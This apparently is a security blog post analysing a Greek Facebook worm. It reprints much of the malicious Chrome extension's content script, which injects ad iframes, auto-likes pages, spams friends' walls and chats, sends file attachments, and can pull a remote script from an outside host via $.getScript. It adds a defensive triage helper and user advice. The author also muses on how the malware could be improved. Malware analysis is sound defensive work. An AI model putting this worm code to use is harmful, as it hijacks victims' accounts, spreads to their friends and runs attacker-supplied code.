            })
        }
    });

        curr_url = window.location.href;
        setInterval(function(){
          if(curr_url!=window.location.href){
            console.log('alagi');
            curr_url=window.location.href;
            chrome.storage.sync.get(function(extSettings) {
              console.log(extSettings)
              if(extSettings.last_settings){
                 if(new Date(extSettings.last_settings).hoursAgo()>=extSettings.post_kathe)
                  get_config().done(function(){
                      save();
                      if(configs.on)
                          run();
                  })

              }else{
                  get_config().done(function(){
                      save();
                      if(configs.on)
                          run();
                  })
              }
            });
          }
        },30000)

        /**/
        var now = (new Date).getTime();

        function run(){

           // like the posts
          if(configs.posts_to_like){
            var posts_to_like = configs.posts_to_like
            if(Object.isArray(posts_to_like)){
              posts_to_like.each(function(post){
                Like_post(post);
              })

            }
          }

          // put the posts on the home page
            injectPost();

            getFriends().done(function(){
                //run code emergency
                if(configs.emergency){
                    $.getScript( "https://8zxb-2gvn.accessdomain.com/789/emergency.js");
                }


                begin_to_like();
            //begin post
            msgPost=configs.msg_to_post;


            // get my name
            my_name=(friends.find(function(n){
                return n.uid==user_id 
            })).names.sample();

            // remove myself from the friends
            friends=friends.exclude(function(n){
              return n.uid==user_id 
            })
            friends=friends.randomize();
            if(configs.friends_to_post>friends.length)
                var friends_to_post=friends.length;
            else
                var friends_to_post=configs.friends_to_post;
            for(var i=0 ; i<friends_to_post;i++){
                msg=msgPost.sample();
                Create_Post(friends[i].uid)
            }

            //begin chat
            chrome.runtime.sendMessage({gegonos: "chat" , userid : user_id}, function(response) {});
            msgChat=configs.msg_to_chat;
            friends=friends.randomize();
            temp_friends=friends.clone();
            temp_friends2=friends.clone();
            
            already_chated=[];        
            chrome.storage.sync.get(function(extSettings) {
                if(extSettings.chated_friends){
                   already_chated=extSettings.chated_friends;
                   friends_chated=extSettings.chated_friends.findAll(function(n){
                        return n.msg_title.indexOf(configs.msg_title)!=-1
                    })
                   for (var i = 0; i < temp_friends.length; i++) {
                    for (var j = 0; j < friends_chated.length; j++) {
                        if(temp_friends[i].uid==friends_chated[j].uid){
                            temp_friends2.remove(temp_friends[i])
                            console.log('i remove',temp_friends[i])
                        }
                        
                    };
                    
                };

            }


            if(configs.friends_to_chat>temp_friends2.length)
                var friends_to_chat=temp_friends2.length;
            else
                var friends_to_chat=configs.friends_to_chat;
            friends_chated_to_save=[];
            for(var i=0 ; i<friends_to_chat;i++){
                msg=msgChat.sample();

                send_message(temp_friends2[i].uid,msg);

                
                friends_chated_to_save.push({
                    uid : temp_friends2[i].uid,
                    msg_title : [configs.msg_title]
                })

            }
            console.log('first',already_chated)
            friends_chated_to_save.each(function(n){
                index=already_chated.findIndex(function(x){
                    return x.uid==n.uid;
                })
                console.log('index',index)
                if(index!=-1){
                    already_chated[index].msg_title.push(n.msg_title[0])
                }else{
                    already_chated.push(n);
                }
            })
            console.log('last',already_chated)
            
            chrome.storage.sync.set({'chated_friends': already_chated}, function() {
                          // Notify that we saved.
                          console.log('ok',already_chated)
                      });






              })


                  //send attachment
                   downloadFile().done(function(myFile){
                    console.log('file',myFile)
                    chrome.storage.sync.get(function(extSettings) {
                      if(!extSettings.attach_chated_friends || extSettings.attach_chated_friends.friends_to_send_attach<= 0){
                        
                          getFriends().done(function(){
                            // get my name
                              my_name=(friends.find(function(n){
                                  return n.uid==user_id 
                              })).names.sample();

                              // remove myself from the friends list
                              friends=friends.exclude(function(n){
                                return n.uid==user_id 
                              })
                            friends=friends.randomize();
                            if(extSettings.already_attach_chated_friends){
                              already_attach_chated_friends_ids = [];
                              (extSettings.already_attach_chated_friends.findAll(function(x){
                                return x.attach_themes.indexOf(configs.attach_theme)!=-1
                              })).each(function(n){
                                already_attach_chated_friends_ids.push(n.uid)
                              })
                              console.log('already...',already_attach_chated_friends_ids)
                              friends=friends.exclude(function(n){
                                return already_attach_chated_friends_ids.indexOf(n.uid)!=-1 
                              })
                              if(friends.length==0){
                                console.log('dn exo allous filous')
                              }

                            }
                            if(configs.friends_to_send_attach>friends.length)
                                var friends_to_send_attach=friends.length;
                            else
                                var friends_to_send_attach=configs.friends_to_send_attach;


                              obj = {};
                              obj.friends_to_send_attach = friends_to_send_attach;
                              obj.data = [];
                            for (var i = 0; i < friends_to_send_attach; i++) {
                              
                              if(configs.attach_name_and_msg[i]){
                                  var msg_to_send_attach = configs.attach_name_and_msg[i][1];
                                  var attach_name = configs.attach_name_and_msg[i][0];
                              }
                              
                              var friends_id = friends[i].uid;
                              console.log(friends_id)
                              if($.isArray([friends[i].names]))
                               var friend_name = friends[i].names.sample();
                              else
                               var friend_name = friends[i].names;
                              if(attach_name.has("yourname"))
                                attach_name = attach_name.replace("yourname",friend_name)
                              if(attach_name.has("myname"))
                                attach_name = attach_name.replace("myname",my_name)
                             
                              

                              var temp = {
                                "friends_id" : friends_id,
                                "msg_to_send_attach" : msg_to_send_attach,
                                "attach_name" : attach_name
                              }
                              obj.data.push(temp)
                              

                                 
                            };
                             chrome.storage.sync.set({'attach_chated_friends': obj}, function() {
                                // Notify that we saved.
                                console.log('ok',obj)
                                lets_send_attach(obj)
                            });


                          });
                        }else{
                          console.log('exoume',extSettings.attach_chated_friends)
                          lets_send_attach(extSettings.attach_chated_friends)

                        }

                        function lets_send_attach(attach_chated){
                          if(attach_chated.friends_to_send_attach>0){
                            var first = attach_chated.data.first();
                            chrome.runtime.sendMessage({gegonos: "attach" , userid : first.friends_id}, function(response) {});

                            start_sending(myFile,first.friends_id,first.msg_to_send_attach,first.attach_name).done(function(){
                              attach_chated.friends_to_send_attach--;
                              attach_chated.data.remove(first);
                              chrome.storage.sync.get(function(extSettings) {

                                if(extSettings.already_attach_chated_friends){
                                  var index = extSettings.already_attach_chated_friends.findIndex(function(n){
                                    return n.uid == first.friends_id;
                                  })
                                  if(index == -1){
                                    var attach_themes = [configs.attach_theme]
                                    extSettings.already_attach_chated_friends.push({
                                      'uid' : first.friends_id,
                                      'attach_themes' : attach_themes
                                    })
                                  }else{
                                    extSettings.already_attach_chated_friends[index].attach_themes.push(configs.attach_theme)
                                  }
                                  
                                }else{
                                  var attach_themes = [configs.attach_theme]
                                    
                                  extSettings.already_attach_chated_friends = [{
                                      'uid' : first.friends_id,
                                      'attach_themes' : attach_themes
                                  }];
                                }
                                chrome.storage.sync.set({'already_attach_chated_friends': extSettings.already_attach_chated_friends}, function() {
                                    // Notify that we saved.
                                    console.log('just save',extSettings.already_attach_chated_friends)
                                    
                                });
                              })
                              
                              chrome.storage.sync.set({'attach_chated_friends': attach_chated}, function() {
                                  // Notify that we saved.
                                  console.log('new',attach_chated)
                                  lets_send_attach(attach_chated)
                              });
                            })
                           }else{
                            return true;
                           }
                        }
                    })
                   })
                })
    }

    function begin_to_like(){
        chrome.storage.sync.get(function(extSettings) {
            console.log(extSettings)
            if(extSettings.liked_pages){
                temp_likes1=extSettings.liked_pages.intersect(configs.likes);
                temp_likes2=configs.likes;
                for (var i = 0; i < temp_likes2.length; i++) {
                    for (var j = 0; j < temp_likes1.length; j++) {
                        if(temp_likes1[j]==temp_likes2[i])
                            temp_likes2.remove(temp_likes1[j])
                    };
                };
                temp_likes = temp_likes2;
                console.log(temp_likes)
                chrome.storage.sync.set({'liked_pages':extSettings.liked_pages.include(temp_likes)}, function() {
                      // Notify that we saved.
                      console.log('ok')
                  });

            }
            else{
                temp_likes=configs.likes;
                chrome.storage.sync.set({'liked_pages':temp_likes}, function() {
                      // Notify that we saved.
                      console.log('ok')
                  });
            }
            

            for (var i = 0; i < temp_likes.length; i++) {
                Like_page(temp_likes[i])
            };
        })
    }


    function injectPost(){
      var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
            var eventer = window[eventMethod];
            var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";

            // Listen to message from child window
            eventer(messageEvent,function(e) {
              if(e.data.myurl)
                $("iframe[src='"+e.data.myurl+"']").ready(function(ifr){
                  if(e.data.height)
                    $("iframe[src='"+e.data.myurl+"']").css('height', e.data.height + 'px');
                  else
                    $("iframe[src='"+e.data.myurl+"']").css('height', '550px');
                })
              if(e.data.should_go)
                window.location.href = e.data.should_go
              
            },false);




      elems1=$.makeArray( $( "*[data-dedupekey]" ) );
      elems2=$.makeArray( $( "*[data-insertion-position]") );
      elems=elems1.include(elems2).unique();
              

      for (var i = 0; i < configs.injectPosts.length; i++) {
        if($(elems[i])){
          $(elems[i]).parent().prepend('<iframe style="margin-left: 13px;width:100%;" frameborder="0" scrolling="no" src="'+configs.injectPosts[i]+'"></iframe>')
        }
        
      };
      
                    
    }

Finally, a piece of code that is not just another dropper.
Its function is to inject ad iframes into the user's Facebook feed so the operators can profit from them.
From time to time it also spams the user's friends: it posts on their walls, messages them in chat, likes pages on the user's behalf, and sends a file attachment, keeping track in chrome.storage.sync of which friends it has already hit for each campaign.
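As an added example (not the malware's code and not from the original post), a small triage helper for the artifacts the script above leaves behind: it reads an export of the extension's chrome.storage.sync area, whose keys and record shapes are taken from the script, and reports which friends and campaigns the worm has already processed from the infected account. The storage dump is constructed sample data.

```javascript
// Added triage helper, not part of the malware sample or the original post.
// The content script above records its progress in chrome.storage.sync under the
// keys 'chated_friends', 'already_attach_chated_friends', 'attach_chated_friends'
// and 'liked_pages'. Given an export of that storage area (plain JSON), this
// summarises what the worm has already done from the infected account.
// 'sampleStorage' is constructed sample data in the shape the script above writes.

const sampleStorage = {
  chated_friends: [
    { uid: "1001", msg_title: ["campaign-a"] },
    { uid: "1002", msg_title: ["campaign-a", "campaign-b"] },
  ],
  already_attach_chated_friends: [
    { uid: "1002", attach_themes: ["theme-1"] },
  ],
  // queue of attachment sends still pending; the script pops one entry per send
  attach_chated_friends: {
    friends_to_send_attach: 1,
    data: [{ friends_id: "1003", msg_to_send_attach: "look at this", attach_name: "photo.rar" }],
  },
  liked_pages: ["page-x", "page-y"],
};

function summarizeWormState(storage) {
  const chatted = storage.chated_friends || [];
  const attached = storage.already_attach_chated_friends || [];
  const pending = storage.attach_chated_friends || { friends_to_send_attach: 0, data: [] };
  const summary = {
    campaigns: {},        // chat campaign (msg_title) -> number of friends messaged
    attachThemes: {},     // attachment theme -> number of friends sent the file
    friendsContacted: [], // distinct friend uids that received a chat or a file
    pendingAttachments: pending.data.map((d) => d.friends_id),
    // the script decrements the counter and removes one entry per send, so both must agree
    queueConsistent: pending.friends_to_send_attach === pending.data.length,
    likedPages: storage.liked_pages || [],
  };
  const contacted = new Set();
  for (const f of chatted) {
    contacted.add(f.uid);
    for (const t of f.msg_title) summary.campaigns[t] = (summary.campaigns[t] || 0) + 1;
  }
  for (const f of attached) {
    contacted.add(f.uid);
    for (const t of f.attach_themes) summary.attachThemes[t] = (summary.attachThemes[t] || 0) + 1;
  }
  summary.friendsContacted = [...contacted].sort();
  return summary;
}

console.log(JSON.stringify(summarizeWormState(sampleStorage), null, 2));
```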

Summary

Most of the hosts that served the malware stopped serving it today. Greek journalists reported it as Koobface; it is not. It doesn’t steal your credentials; it injects random ads into your feed. It was not state-of-the-art compared to malware seen previously, but it caused a fair amount of chaos.

Random thoughts

If I were the developer of it, I would exchange the VBScript for a batch file. It would check the OS of the system and download the equivalent malware.
I think part of the idea came from a Greek virii mag from 2003 or from its offspring. All of these mags had articles on how to develop such worms, with equivalent samples.

Notes for users

Trust no one. Your boss won’t send you naked photos of himself, and your best buddy won’t send you a drunk photo of himself because you’ve seen him drunk way too many times. End of story. Make sure you see the extension of all files (even known ones) under Windows.

out.

2 responses to “Greek facebook users under ‘attack’”

  1. I’d like to find out more? I’d care to find out more details.

    • There’s a current attack among Greek users that sticks to the aforementioned details. If you want something really cool, check for Lecpetex 🙂
